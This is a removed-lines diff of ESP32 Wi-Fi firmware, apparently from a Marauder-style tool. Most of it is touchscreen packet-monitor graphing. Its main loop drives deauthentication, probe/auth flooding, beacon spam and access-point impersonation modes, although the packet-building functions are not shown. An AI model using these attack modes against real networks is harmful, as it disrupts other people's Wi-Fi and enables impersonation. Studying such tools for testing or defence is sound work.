- //y_pos_y = ((-num_deauth * (y_scale * 3)) + (HEIGHT_1 - 2)); // RED
- //y_pos_z = ((-num_probe * (y_scale * 3)) + (HEIGHT_1 - 2)); // BLUE
-
- //Serial.println("num_beacon: " + (String)num_beacon);
- //Serial.println("num_deauth: " + (String)num_deauth);
- //Serial.println(" num_probe: " + (String)num_probe);
-
- //num_beacon = 0;
- //num_probe = 0;
- //num_deauth = 0;
-
- //CODE FOR PLOTTING CONTINUOUS LINES!!!!!!!!!!!!
- //Plot "X" value
- display_obj.tft.drawLine(x_pos - x_scale, y_pos_x_old, x_pos, y_pos_x, TFT_CYAN);
- //Plot "Z" value
- //display_obj.tft.drawLine(x_pos - x_scale, y_pos_z_old, x_pos, y_pos_z, TFT_BLUE);
- //Plot "Y" value
- //display_obj.tft.drawLine(x_pos - x_scale, y_pos_y_old, x_pos, y_pos_y, TFT_RED);
-
- //Draw preceding black 'boxes' to erase old plot lines, !!!WEIRD CODE TO COMPENSATE FOR BUTTONS AND COLOR KEY SO 'ERASER' DOESN'T ERASE BUTTONS AND COLOR KEY!!!
- //if ((x_pos <= 90) || ((x_pos >= 198) && (x_pos <= 320))) //above x axis
- if ((x_pos <= 90) || ((x_pos >= 117) && (x_pos <= 320))) //above x axis
- {
- display_obj.tft.fillRect(x_pos+1, 28, 10, 93, TFT_BLACK); //compensate for buttons!
- }
- else
- {
- display_obj.tft.fillRect(x_pos+1, 0, 10, 121, TFT_BLACK); //don't compensate for buttons!
- }
- //if ((x_pos >= 254) && (x_pos <= 320)) //below x axis
- //if (x_pos <= 90)
- if (x_pos < 0) // below x axis
- {
- //tft.fillRect(x_pos+1, 121, 10, 88, TFT_BLACK);
- display_obj.tft.fillRect(x_pos+1, 121, 10, 88, TFT_CYAN);
- }
- else
- {
- //tft.fillRect(x_pos+1, 121, 10, 119, TFT_BLACK);
- display_obj.tft.fillRect(x_pos+1, 121, 10, 118, TFT_BLACK);
- }
-
- //tftDisplayTime();
-
- if ( (y_pos_x == 120) || (y_pos_y == 120) || (y_pos_z == 120) )
- {
- display_obj.tft.drawFastHLine(10, 120, 310, TFT_WHITE); // x axis
- }
-
- y_pos_x_old = y_pos_x; //set old y pos values to current y pos values
- //y_pos_y_old = y_pos_y;
- //y_pos_z_old = y_pos_z;
-
- //delay(50);
- }
-
- sd_obj.main();
-
- }
-
- display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK); //erase XY buttons and any lines behind them
- display_obj.tft.fillRect(12, 0, 90, 32, TFT_BLACK); // key
- display_obj.tftDrawChannelScaleButtons(set_channel);
- display_obj.tftDrawExitScaleButtons();
- display_obj.tftDrawEapolColorKey();
- display_obj.tftDrawGraphObjects(x_scale);
- }
- void WiFiScan::packetMonitorMain(uint32_t currentTime)
- {
- //---------MAIN 'FOR' LOOP! THIS IS WHERE ALL THE ACTION HAPPENS! HAS TO BE FAST!!!!!---------\\
-
-
- // for (x_pos = (11 + x_scale); x_pos <= 320; x_pos += x_scale) //go along every point on the x axis and do something, start over when finished
- for (x_pos = (11 + x_scale); x_pos <= 320; x_pos = x_pos)
- {
- currentTime = millis();
- do_break = false;
-
- y_pos_x = 0;
- y_pos_y = 0;
- y_pos_z = 0;
- boolean pressed = false;
-
- uint16_t t_x = 0, t_y = 0; // To store the touch coordinates
-
- // Do the touch stuff
- pressed = display_obj.tft.getTouch(&t_x, &t_y);
-
- if (pressed) {
- Serial.print("Got touch | X: ");
- Serial.print(t_x);
- Serial.print(" Y: ");
- Serial.println(t_y);
- }
-
-
- // Check buttons for presses
- for (uint8_t b = 0; b < BUTTON_ARRAY_LEN; b++)
- {
- if (pressed && display_obj.key[b].contains(t_x, t_y))
- {
- display_obj.key[b].press(true);
- } else {
- display_obj.key[b].press(false);
- }
- }
-
- // Which buttons pressed
- for (uint8_t b = 0; b < BUTTON_ARRAY_LEN; b++)
- {
- if (display_obj.key[b].justPressed())
- {
- Serial.println("Bro, key pressed");
- //do_break = true;
- }
-
- if (display_obj.key[b].justReleased())
- {
- do_break = true;
-
- // X - button pressed
- if (b == 0) {
- if (x_scale > 1) {
- x_scale--;
- delay(70);
- display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
- display_obj.tftDrawXScaleButtons(x_scale);
- display_obj.tftDrawYScaleButtons(y_scale);
- display_obj.tftDrawChannelScaleButtons(set_channel);
- display_obj.tftDrawExitScaleButtons();
- break;
- }
- }
- // X + button pressed
- else if (b == 1) {
- if (x_scale < 6) {
- x_scale++;
- delay(70);
- display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
- display_obj.tftDrawXScaleButtons(x_scale);
- display_obj.tftDrawYScaleButtons(y_scale);
- display_obj.tftDrawChannelScaleButtons(set_channel);
- display_obj.tftDrawExitScaleButtons();
- break;
- }
- }
-
- // Y - button pressed
- else if (b == 2) {
- if (y_scale > 1) {
- y_scale--;
- delay(70);
- display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
- display_obj.tftDrawXScaleButtons(x_scale);
- display_obj.tftDrawYScaleButtons(y_scale);
- display_obj.tftDrawChannelScaleButtons(set_channel);
- display_obj.tftDrawExitScaleButtons();
- //updateMidway();
- break;
- }
- }
-
- // Y + button pressed
- else if (b == 3) {
- if (y_scale < 9) {
- y_scale++;
- delay(70);
- display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
- display_obj.tftDrawXScaleButtons(x_scale);
- display_obj.tftDrawYScaleButtons(y_scale);
- display_obj.tftDrawChannelScaleButtons(set_channel);
- display_obj.tftDrawExitScaleButtons();
- //updateMidway();
- break;
- }
- }
-
- // Channel - button pressed
- else if (b == 4) {
- if (set_channel > 1) {
- Serial.println("Shit channel down");
- set_channel--;
- delay(70);
- display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
- display_obj.tftDrawXScaleButtons(x_scale);
- display_obj.tftDrawYScaleButtons(y_scale);
- display_obj.tftDrawChannelScaleButtons(set_channel);
- display_obj.tftDrawExitScaleButtons();
- changeChannel();
- break;
- }
- }
-
- // Channel + button pressed
- else if (b == 5) {
- if (set_channel < MAX_CHANNEL) {
- Serial.println("Shit channel up");
- set_channel++;
- delay(70);
- display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK);
- display_obj.tftDrawXScaleButtons(x_scale);
- display_obj.tftDrawYScaleButtons(y_scale);
- display_obj.tftDrawChannelScaleButtons(set_channel);
- display_obj.tftDrawExitScaleButtons();
- changeChannel();
- break;
- }
- }
- else if (b == 6) {
- Serial.println("Exiting packet monitor...");
- this->StartScan(WIFI_SCAN_OFF);
- //display_obj.tft.init();
- this->orient_display = true;
- return;
- }
- }
- }
-
- if (currentTime - initTime >= GRAPH_REFRESH) {
- //Serial.println("-----------------------------------------");
- //Serial.println("Time elapsed: " + (String)(currentTime - initTime) + "ms");
- x_pos += x_scale;
- initTime = millis();
- y_pos_x = ((-num_beacon * (y_scale * 3)) + (HEIGHT_1 - 2)); // GREEN
- y_pos_y = ((-num_deauth * (y_scale * 3)) + (HEIGHT_1 - 2)); // RED
- y_pos_z = ((-num_probe * (y_scale * 3)) + (HEIGHT_1 - 2)); // BLUE
-
- //Serial.println("num_beacon: " + (String)num_beacon);
- //Serial.println("num_deauth: " + (String)num_deauth);
- //Serial.println(" num_probe: " + (String)num_probe);
-
- num_beacon = 0;
- num_probe = 0;
- num_deauth = 0;
-
- //CODE FOR PLOTTING CONTINUOUS LINES!!!!!!!!!!!!
- //Plot "X" value
- display_obj.tft.drawLine(x_pos - x_scale, y_pos_x_old, x_pos, y_pos_x, TFT_GREEN);
- //Plot "Z" value
- display_obj.tft.drawLine(x_pos - x_scale, y_pos_z_old, x_pos, y_pos_z, TFT_BLUE);
- //Plot "Y" value
- display_obj.tft.drawLine(x_pos - x_scale, y_pos_y_old, x_pos, y_pos_y, TFT_RED);
-
- //Draw preceding black 'boxes' to erase old plot lines, !!!WEIRD CODE TO COMPENSATE FOR BUTTONS AND COLOR KEY SO 'ERASER' DOESN'T ERASE BUTTONS AND COLOR KEY!!!
- //if ((x_pos <= 90) || ((x_pos >= 198) && (x_pos <= 320))) //above x axis
- if ((x_pos <= 90) || ((x_pos >= 117) && (x_pos <= 320))) //above x axis
- {
- display_obj.tft.fillRect(x_pos+1, 28, 10, 93, TFT_BLACK); //compensate for buttons!
- }
- else
- {
- display_obj.tft.fillRect(x_pos+1, 0, 10, 121, TFT_BLACK); //don't compensate for buttons!
- }
- //if ((x_pos >= 254) && (x_pos <= 320)) //below x axis
- //if (x_pos <= 90)
- if (x_pos < 0) // below x axis
- {
- //tft.fillRect(x_pos+1, 121, 10, 88, TFT_BLACK);
- display_obj.tft.fillRect(x_pos+1, 121, 10, 88, TFT_CYAN);
- }
- else
- {
- //tft.fillRect(x_pos+1, 121, 10, 119, TFT_BLACK);
- display_obj.tft.fillRect(x_pos+1, 121, 10, 118, TFT_BLACK);
- }
-
- //tftDisplayTime();
-
- if ( (y_pos_x == 120) || (y_pos_y == 120) || (y_pos_z == 120) )
- {
- display_obj.tft.drawFastHLine(10, 120, 310, TFT_WHITE); // x axis
- }
-
- y_pos_x_old = y_pos_x; //set old y pos values to current y pos values
- y_pos_y_old = y_pos_y;
- y_pos_z_old = y_pos_z;
-
- //delay(50);
- }
-
- sd_obj.main();
-
- }
-
- display_obj.tft.fillRect(127, 0, 193, 28, TFT_BLACK); //erase XY buttons and any lines behind them
- //tft.fillRect(56, 0, 66, 32, TFT_ORANGE); //erase time and color key and any stray lines behind them
- display_obj.tft.fillRect(12, 0, 90, 32, TFT_BLACK); // key
-
- display_obj.tftDrawXScaleButtons(x_scale); //redraw stuff
- display_obj.tftDrawYScaleButtons(y_scale);
- display_obj.tftDrawChannelScaleButtons(set_channel);
- display_obj.tftDrawExitScaleButtons();
- display_obj.tftDrawColorKey();
- display_obj.tftDrawGraphObjects(x_scale);
- }
- #endif
- //void WiFiScan::sniffer_callback(void* buf, wifi_promiscuous_pkt_type_t type) {
- // wifi_promiscuous_pkt_t *snifferPacket = (wifi_promiscuous_pkt_t*)buf;
- // showMetadata(snifferPacket, type);
- //}
- void WiFiScan::changeChannel(int chan) {
- this->set_channel = chan;
- esp_wifi_set_channel(this->set_channel, WIFI_SECOND_CHAN_NONE);
- delay(1);
- }
- void WiFiScan::changeChannel()
- {
- esp_wifi_set_channel(this->set_channel, WIFI_SECOND_CHAN_NONE);
- delay(1);
- }
- // Function to cycle to the next channel
- void WiFiScan::channelHop()
- {
- this->set_channel = this->set_channel + 1;
- if (this->set_channel > 13) {
- this->set_channel = 1;
- }
- esp_wifi_set_channel(this->set_channel, WIFI_SECOND_CHAN_NONE);
- delay(1);
- }
- char* WiFiScan::stringToChar(String string) {
- char buf[string.length() + 1] = {};
- string.toCharArray(buf, string.length() + 1);
- return buf;
- }
- // Function for updating scan status
- void WiFiScan::main(uint32_t currentTime)
- {
- // WiFi operations
- if ((currentScanMode == WIFI_SCAN_PROBE) ||
- (currentScanMode == WIFI_SCAN_AP) ||
- (currentScanMode == WIFI_SCAN_TARGET_AP) ||
- (currentScanMode == WIFI_SCAN_PWN) ||
- (currentScanMode == WIFI_SCAN_ESPRESSIF) ||
- (currentScanMode == WIFI_SCAN_DEAUTH) ||
- (currentScanMode == WIFI_SCAN_ALL))
- {
- if (currentTime - initTime >= this->channel_hop_delay * 1000)
- {
- initTime = millis();
- channelHop();
- }
- }
- else if (currentScanMode == WIFI_PACKET_MONITOR)
- {
- #ifdef HAS_SCREEN
- #ifndef MARAUDER_MINI
- packetMonitorMain(currentTime);
- #endif
- #endif
- }
- else if (currentScanMode == WIFI_SCAN_EAPOL)
- {
- #ifdef HAS_SCREEN
- #ifndef MARAUDER_MINI
- eapolMonitorMain(currentTime);
- #endif
- #endif
- }
- else if (currentScanMode == WIFI_SCAN_ACTIVE_EAPOL)
- {
- #ifdef HAS_SCREEN
- eapolMonitorMain(currentTime);
- #endif
- }
- else if (currentScanMode == WIFI_ATTACK_AUTH) {
- for (int i = 0; i < 55; i++)
- this->sendProbeAttack(currentTime);
- if (currentTime - initTime >= 1000) {
- initTime = millis();
- String displayString = "";
- String displayString2 = "";
- displayString.concat(text18);
- displayString.concat(packets_sent);
- for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
- displayString2.concat(" ");
- #ifdef HAS_SCREEN
- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- display_obj.showCenterText(displayString2, 160);
- display_obj.showCenterText(displayString, 160);
- #endif
- packets_sent = 0;
- }
- }
- else if (currentScanMode == WIFI_ATTACK_DEAUTH) {
- for (int i = 0; i < 55; i++)
- this->sendDeauthAttack(currentTime);
- if (currentTime - initTime >= 1000) {
- initTime = millis();
- String displayString = "";
- String displayString2 = "";
- displayString.concat(text18);
- displayString.concat(packets_sent);
- for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
- displayString2.concat(" ");
- #ifdef HAS_SCREEN
- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- display_obj.showCenterText(displayString2, 160);
- display_obj.showCenterText(displayString, 160);
- #endif
- packets_sent = 0;
- }
- }
- else if ((currentScanMode == WIFI_ATTACK_MIMIC)) {
- // Need this for loop because getTouch causes ~10ms delay
- // which makes beacon spam less effective
- for (int i = 0; i < access_points->size(); i++) {
- if (access_points->get(i).selected)
- this->broadcastCustomBeacon(currentTime, ssid{access_points->get(i).essid, {random(256),
- random(256),
- random(256),
- random(256),
- random(256),
- random(256)}});
- }
-
- if (currentTime - initTime >= 1000)
- {
- initTime = millis();
- //Serial.print("packets/sec: ");
- //Serial.println(packets_sent);
- String displayString = "";
- String displayString2 = "";
- displayString.concat(text18);
- displayString.concat(packets_sent);
- for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
- displayString2.concat(" ");
- #ifdef HAS_SCREEN
- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- display_obj.showCenterText(displayString2, 160);
- display_obj.showCenterText(displayString, 160);
- #endif
- packets_sent = 0;
- }
- }
- else if ((currentScanMode == WIFI_ATTACK_BEACON_SPAM))
- {
- // Need this for loop because getTouch causes ~10ms delay
- // which makes beacon spam less effective
- for (int i = 0; i < 55; i++)
- broadcastRandomSSID(currentTime);
- if (currentTime - initTime >= 1000)
- {
- initTime = millis();
- //Serial.print("packets/sec: ");
- //Serial.println(packets_sent);
- String displayString = "";
- String displayString2 = "";
- displayString.concat(text18);
- displayString.concat(packets_sent);
- for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
- displayString2.concat(" ");
- #ifdef HAS_SCREEN
- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- display_obj.showCenterText(displayString2, 160);
- display_obj.showCenterText(displayString, 160);
- #endif
- packets_sent = 0;
- }
- }
- else if ((currentScanMode == WIFI_ATTACK_BEACON_LIST)) {
- for (int i = 0; i < ssids->size(); i++)
- this->broadcastCustomBeacon(currentTime, ssids->get(i));
- if (currentTime - initTime >= 1000)
- {
- initTime = millis();
- packets_sent = 0;
- }
- }
- else if ((currentScanMode == WIFI_ATTACK_AP_SPAM)) {
- for (int i = 0; i < access_points->size(); i++) {
- if (access_points->get(i).selected)
- this->broadcastCustomBeacon(currentTime, access_points->get(i));
- }
- if (currentTime - initTime >= 1000) {
- initTime = millis();
- packets_sent = 0;
- }
- }
- else if ((currentScanMode == WIFI_ATTACK_RICK_ROLL))
- {
- // Need this for loop because getTouch causes ~10ms delay
- // which makes beacon spam less effective
- for (int i = 0; i < 7; i++)
- {
- for (int x = 0; x < (sizeof(rick_roll)/sizeof(char *)); x++)
- {
- broadcastSetSSID(currentTime, rick_roll[x]);
- }
- }
- if (currentTime - initTime >= 1000)
- {
- initTime = millis();
- //Serial.print("packets/sec: ");
- //Serial.println(packets_sent);
- String displayString = "";
- String displayString2 = "";
- displayString.concat(text18);
- displayString.concat(packets_sent);
- for (int x = 0; x < STANDARD_FONT_CHAR_LIMIT; x++)
- displayString2.concat(" ");
- #ifdef HAS_SCREEN
- display_obj.tft.setTextColor(TFT_GREEN, TFT_BLACK);
- display_obj.showCenterText(displayString2, 160);
- display_obj.showCenterText(displayString, 160);
- #endif
- packets_sent = 0;
- }
- }
- }
|